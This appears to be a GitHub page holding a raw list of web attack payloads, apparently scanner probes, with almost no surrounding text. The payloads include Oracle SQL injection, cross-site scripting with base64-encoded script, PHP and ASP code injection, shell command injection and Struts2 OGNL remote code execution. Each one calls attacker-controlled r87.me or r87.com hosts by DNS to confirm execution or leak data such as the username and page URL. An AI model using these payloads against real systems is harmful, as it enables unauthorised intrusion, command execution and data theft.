| "(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3s3h1u9v_q1t3cgbvrhtgcyjmvvd49py'||'jny.r87.me') from DUAL))))", | |
| '<iMg src="//heq1ggqp3sajhamkfaxifuvuzvlv50ao_kgoh7-idpa.r87.me"/>', | |
| "(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3sbcjv_okxlsibir3umrsijb8l3gyptp'||'jeu.r87.me') from DUAL))))", | |
| '<fRame src="//heq1ggqp3s_bzqzurzfmbgzk6lza43kjytye7fmwlj8.r87.me"></fRame>', | |
| "'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3seh16qfdohbzfbrlfngesheztmklnmc'||'fqs.r87.me') from DUAL))||'", | |
| "'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3sn2whkzgg_twl2jsw0nbxcosuri8u6v'||'qxu.r87.me') from DUAL))||'", | |
| '<fRame src="//heq1ggqp3snrbhdcxhzqaxpfqn6u8nh1nyhqficou20.r87.me"></fRame>', | |
| '(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(115)||chr(100)||chr(102)||chr(107)||chr(110)||chr(101)||chr(109)||chr(55)||chr(116)||chr(50)||chr(108)||chr(105)||chr(112)||chr(53)||chr(108)||chr(116)||chr(57)||chr(113)||chr(117)||chr(98)||chr(118)||chr(102)||chr(105)||chr(95)||chr(112)||chr(99)||chr(111)||chr(115)||chr(116)||chr(108)||chr(104)||chr(115)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)', | |
| '<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vaGVxMWdncXAzc3FiZWhkY3ZwZGViOXB1aHpuYXNkdzhzazUwMGppMiIrInVpMC5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>', | |
| '(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(111)||chr(115)||chr(118)||chr(98)||chr(98)||chr(111)||chr(56)||chr(100)||chr(45)||chr(114)||chr(48)||chr(45)||chr(95)||chr(112)||chr(115)||chr(100)||chr(54)||chr(112)||chr(49)||chr(97)||chr(104)||chr(114)||chr(110)||chr(105)||chr(55)||chr(122)||chr(98)||chr(117)||chr(48)||chr(95)||chr(110)||chr(121)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)', | |
| '(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(101)||chr(120)||chr(111)||chr(119)||chr(109)||chr(98)||chr(45)||chr(114)||chr(108)||chr(119)||chr(56)||chr(106)||chr(99)||chr(108)||chr(115)||chr(113)||chr(120)||chr(115)||chr(111)||chr(117)||chr(101)||chr(111)||chr(107)||chr(111)||chr(48)||chr(110)||chr(102)||chr(110)||chr(107)||chr(97)||chr(56)||chr(97)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))', | |
| '<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vaGVxMWdncXAzc25oLWYzbzN5aHFhYnB1aThhMzd0djc4YmljX25lZSIrInk4cy5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>', | |
| '(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(104)||chr(111)||chr(113)||chr(111)||chr(54)||chr(114)||chr(118)||chr(101)||chr(102)||chr(99)||chr(100)||chr(104)||chr(101)||chr(120)||chr(50)||chr(110)||chr(52)||chr(122)||chr(111)||chr(110)||chr(114)||chr(95)||chr(117)||chr(101)||chr(48)||chr(118)||chr(100)||chr(101)||chr(103)||chr(120)||chr(107)||chr(111)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))', | |
| '";l=document.createElement("link");l.rel="prefetch";l.href="//heq1ggqp3sd5ssjshzerwpolelvzvg5qa5k1h4yr"+"18w.r87.me/r/?"+location.href;document.head.appendChild(l);//', | |
| "'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(52)||chr(113)||chr(100)||chr(110)||chr(108)||chr(119)||chr(48)||chr(109)||chr(118)||chr(110)||chr(120)||chr(116)||chr(100)||chr(120)||chr(108)||chr(120)||chr(95)||chr(114)||chr(100)||chr(106)||chr(113)||chr(56)||chr(102)||chr(119)||chr(115)||chr(98)||chr(98)||chr(112)||chr(99)||chr(54)||chr(56)||chr(106)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'", | |
| "'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(100)||chr(106)||chr(114)||chr(117)||chr(108)||chr(56)||chr(110)||chr(118)||chr(112)||chr(119)||chr(50)||chr(118)||chr(104)||chr(115)||chr(122)||chr(112)||chr(97)||chr(104)||chr(111)||chr(98)||chr(111)||chr(103)||chr(49)||chr(110)||chr(109)||chr(111)||chr(108)||chr(99)||chr(110)||chr(97)||chr(122)||chr(49)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'", | |
| '";l=document.createElement("link");l.rel="prefetch";l.href="//heq1ggqp3sb-gyuktbuqxddqitodsjxji65feh8c"+"phi.r87.me/r/?"+location.href;document.head.appendChild(l);//', | |
| '\';l=document.createElement("link");l.rel="prefetch";l.href="//heq1ggqp3sqvscprpun4qjee_un1f-cggy4rodo6"+"hay.r87.me/r/?"+location.href;document.head.appendChild(l);//', | |
| '\';l=document.createElement("link");l.rel="prefetch";l.href="//heq1ggqp3s8bcmnb-r4dnshedlaqquwf6ygh4gst"+"rl4.r87.me/r/?"+location.href;document.head.appendChild(l);//', | |
| 'nn1.als.lbl.gov.r87.com/?', | |
| 'http://heq1ggqp3s5fbknolfr1letsptdtgbckweu9aoj9a43.r87.me/p/', | |
| 'http://heq1ggqp3swqur9p0ddcpxba4hhfy1txobph237vswz.r87.me/p/', | |
| 'php://filter//resource=http://heq1ggqp3stslbqg15ewyyso8anbcr_lfchvupcdbpj.r87.me/p/', | |
| 'php://filter//resource=http://heq1ggqp3swqrixycnsowerrady8oepdl6ut-8637gz.r87.me/p/', | |
| 'heq1ggqp3stpycwgfr_brhcrzidpjbcngirtme7odvn.r87.me/p/', | |
| 'heq1ggqp3sgd4unphgftvjox3imffmgsm_59cpekfe3.r87.me/p/', | |
| "gethostbyname(trim('heq1ggqp3sb2pe6pu65ue2atryqbgx2omzvl86oc'.'bci.r87.me'))", | |
| "gethostbyname(trim('heq1ggqp3sayu4-eouqsdpa290ralpp3kdixypzp'.'kmk.r87.me'))", | |
| 'http://nn1.als.lbl.gov.r87.com/?', | |
| "gethostbyname(trim('heq1ggqp3s_wza6kgd1wolzkzjxwawqh1korc92-'.'o9q.r87.me'));", | |
| "gethostbyname(trim('heq1ggqp3s92cf1gelqksy6jtv3d78dx2xjksfwi'.'1fo.r87.me'));", | |
| "+gethostbyname(trim('heq1ggqp3s0d2xtrb0qvrwc3xkgtblavlgb67ehv'.'ywa.r87.me'));//", | |
| "+gethostbyname(trim('heq1ggqp3s-2e_40bac_irtjhnfguqlac-6fh7pv'.'phy.r87.me'));//", | |
| "'+gethostbyname(trim('heq1ggqp3sow5g6uxrictu-jtsibho1hmbkskafn'.'byu.r87.me'))+'", | |
| "'+gethostbyname(trim('heq1ggqp3sdto2-kfxzap6g4zqjhup8cn0fpoiom'.'ye8.r87.me'))+'", | |
| '"+gethostbyname(trim(\'heq1ggqp3siwg9mopw0e_iaucsfoqs7pad0eabwz\'.\'kxc.r87.me\'))+"', | |
| '"+gethostbyname(trim(\'heq1ggqp3sg3xlxijuwmy2qvmnvwbdu1c-3mdupg\'.\'pu4.r87.me\'))+"', | |
| "<? gethostbyname(trim('heq1ggqp3sz9hb2_diiaz-o0wivrxurpn-4l8agz'.'tzw.r87.me'));//?>", | |
| "<? gethostbyname(trim('heq1ggqp3sow4p-ljw2spmixtivxpnr8az7m-tqj'.'q_c.r87.me'));//?>", | |
| "'{${gethostbyname(trim('heq1ggqp3snhrudadumwalosiflisylw8vvba4le'.'nrc.r87.me'))}}'", | |
| "'{${gethostbyname(trim('heq1ggqp3skrvflbjw4fhp8b7zyljgdv5yvysxae'.'lnq.r87.me'))}}'", | |
| 'createobject("WScript.Shell").exec("nslookup heq1ggqp3s5dxxf5i7yuf1oqwjjc_ysgrts5o0rg" & "qjy.r87.me").StdOut.ReadAll', | |
| 'createobject("WScript.Shell").exec("nslookup heq1ggqp3suzewbweyeflu2vlf6jyfvfbpislrxf" & "p-e.r87.me").StdOut.ReadAll', | |
| '+createobject("WScript.Shell").exec("nslookup heq1ggqp3scqaed9iqbkalsi2g27y8axjendy-pl" & "1ru.r87.me").StdOut.ReadAll', | |
| '+createobject("WScript.Shell").exec("nslookup heq1ggqp3squeczdrfmrzvtnmdltlk5n8covi-5y" & "hyy.r87.me").StdOut.ReadAll', | |
| '+createobject("WScript.Shell").exec("nslookup heq1ggqp3sfs0kbxfad9obxgs7l27_naw8mlmqga" & "jus.r87.me").StdOut.ReadAll+', | |
| '+createobject("WScript.Shell").exec("nslookup heq1ggqp3soojmrbths9pk7qeiqnhptozqlxuogz" & "z6a.r87.me").StdOut.ReadAll+', | |
| '<%createobject("WScript.Shell").exec("nslookup heq1ggqp3sj0t2r13vcgj0vovzlrcixhde157b07" & "mjg.r87.me").StdOut.ReadAll%>', | |
| '<%createobject("WScript.Shell").exec("nslookup heq1ggqp3sp-aqqeuvcnrhibq4uafpq4xxnwqz4g" & "k8g.r87.me").StdOut.ReadAll%>', | |
| '"+createobject("WScript.Shell").exec("nslookup heq1ggqp3sx5rstdm8cvwpb6qxmtczpassv22wll" & "chu.r87.me").StdOut.ReadAll+"', | |
| 'https://nn1.als.lbl.gov.r87.com/?', | |
| '"+createobject("WScript.Shell").exec("nslookup heq1ggqp3sosjhqtlqjmckrnjmugsdy4ueh3fexy" & "tzi.r87.me").StdOut.ReadAll+"', | |
| "gethostbyname(lc 'heq1ggqp3sf6wodgrmtfwdhroz-jjpd4bcj5qd-v'.'oei.r87.me')", | |
| "gethostbyname(lc 'heq1ggqp3sovw5qpo-alvslahriruklzcuv6pymv'.'4w4.r87.me')", | |
| "eval('gethostbyname(lc 'heq1ggqp3s1z1iph4adorhg94h4utuevjqgte_vx'.'tkc.r87.me')')", | |
| "eval('gethostbyname(lc 'heq1ggqp3s7tzesmm5zc1ftic6zh3z7696tvr9yd'.'juw.r87.me')')", | |
| "'+gethostbyname(lc 'heq1ggqp3spu7pfhto3u-1omrqi_ohzoog9l-pjr'.'d4m.r87.me')+'", | |
| "'+gethostbyname(lc 'heq1ggqp3spa_g8i4ixk182rwsmkwgk1k467tiwv'.'k3i.r87.me')+'", | |
| '"+gethostbyname(lc \'heq1ggqp3s5nb8pypmcqdc8w7wlnelhu7tgtwzc1\'.\'cf8.r87.me\')+"', | |
| '"+gethostbyname(lc \'heq1ggqp3seyzzn1wv-kjeavmlsadf8pxcjjrgc1\'.\'b5a.r87.me\')+"', | |
| 'nslookup heq1ggqp3s5seoumneetk_pn_wbivcz8d9in0c8okqe.r87.me&\'\\"`0&nslookup heq1ggqp3s5seoumneetk_pn_wbivcz8d9in0c8okqe.r87.me&`\'', | |
| 'nslookup heq1ggqp3shuhnotiubu7ay3a-lpxb3w3lbjfqgfjd8.r87.me&\'\\"`0&nslookup heq1ggqp3shuhnotiubu7ay3a-lpxb3w3lbjfqgfjd8.r87.me&`\'', | |
| '& nslookup heq1ggqp3sbnlju9tb5qq9uhgbdmcgsn4l_rjphz6w8.r87.me&\'\\"`0&nslookup heq1ggqp3sbnlju9tb5qq9uhgbdmcgsn4l_rjphz6w8.r87.me&`\'', | |
| '& nslookup heq1ggqp3srvsxnmjsgs_4cf54qwucvqf8ff2gzsr-y.r87.me&\'\\"`0&nslookup heq1ggqp3srvsxnmjsgs_4cf54qwucvqf8ff2gzsr-y.r87.me&`\'', | |
| '\'& nslookup heq1ggqp3spihjratdomayvmfzmbr4ysndo6dem6llg.r87.me&\'\\"`0&nslookup heq1ggqp3spihjratdomayvmfzmbr4ysndo6dem6llg.r87.me&`\'', | |
| '\'& nslookup heq1ggqp3shonhvdjjirtyw5qp-sl4pm7k7dylgbz08.r87.me&\'\\"`0&nslookup heq1ggqp3shonhvdjjirtyw5qp-sl4pm7k7dylgbz08.r87.me&`\'', | |
| '"& nslookup heq1ggqp3suykz0pbjfpctqgvqxvpoyucdtd0y6gmw4.r87.me&\'\\"`0&nslookup heq1ggqp3suykz0pbjfpctqgvqxvpoyucdtd0y6gmw4.r87.me&`\'', | |
| '"& nslookup heq1ggqp3s7fqsfnl4jdfxcnanohu-nzqy1f_f4rwgm.r87.me&\'\\"`0&nslookup heq1ggqp3s7fqsfnl4jdfxcnanohu-nzqy1f_f4rwgm.r87.me&`\'', | |
| 'nslookup "heq1ggqp3skwkegn7mqhd2xoes9ya5qwiqrlmurz""_uc.r87.me"', | |
| 'nslookup "heq1ggqp3sljepe8gebgelfbwdjzvqjapbisur8q""0dk.r87.me"', | |
| '&nslookup "heq1ggqp3sdbpw47wk82f4p38bgtpodeduqaskhh""tuc.r87.me"', | |
| '&nslookup "heq1ggqp3syryhu_fl-sdsfuai2878k-xrhzblqa""enk.r87.me"', | |
| '\'&nslookup "heq1ggqp3sijmzhz8hof6whcjgbkaidk2ecca91i""2zs.r87.me"', | |
| '\'&nslookup "heq1ggqp3sll5xahvwrljyrmebe129zvdn77ut1i""yvq.r87.me"', | |
| '"&nslookup "heq1ggqp3sqenxpuxr4pdkptjps9jnyqud4zeogz""_es.r87.me"', | |
| '"&nslookup "heq1ggqp3s8yplghxftuv83cdf3t2wwuph-uogma""pog.r87.me"', | |
| '|nslookup${IFS}"heq1ggqp3suzzrpvpgofyjlfk14rb1qjssxs-2ww""b0m.r87.me"', | |
| '|nslookup${IFS}"heq1ggqp3sutjrvakbcwz15110d8dgo5ymn0dlhv""txs.r87.me"', | |
| '%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'nslookup `whoami`."heq1ggqp3skezb9ishgolltzmv2unseufnu-wqmo""spa.r87.me"\').(#p=new java.lang.ProcessBuilder({\'/bin/bash\',\'-c\',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}', | |
| '%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'nslookup `whoami`."heq1ggqp3sqgon3v2bsgn5sga9xulh2ek_tbz9rn""120.r87.me"\').(#p=new java.lang.ProcessBuilder({\'/bin/bash\',\'-c\',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}', | |
| '%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'nslookup "heq1ggqp3s0_c6jfvepgbnn7sdb3btjd0saotlkj"hig.r87.me"\').(#p=new java.lang.ProcessBuilder({\'cmd.exe\',\'/c\',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}', | |
| '%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'nslookup "heq1ggqp3sjgsyqpg8trfcnh5psujuhod7bmc3ed"krk.r87.me"\').(#p=new java.lang.ProcessBuilder({\'cmd.exe\',\'/c\',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}'] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment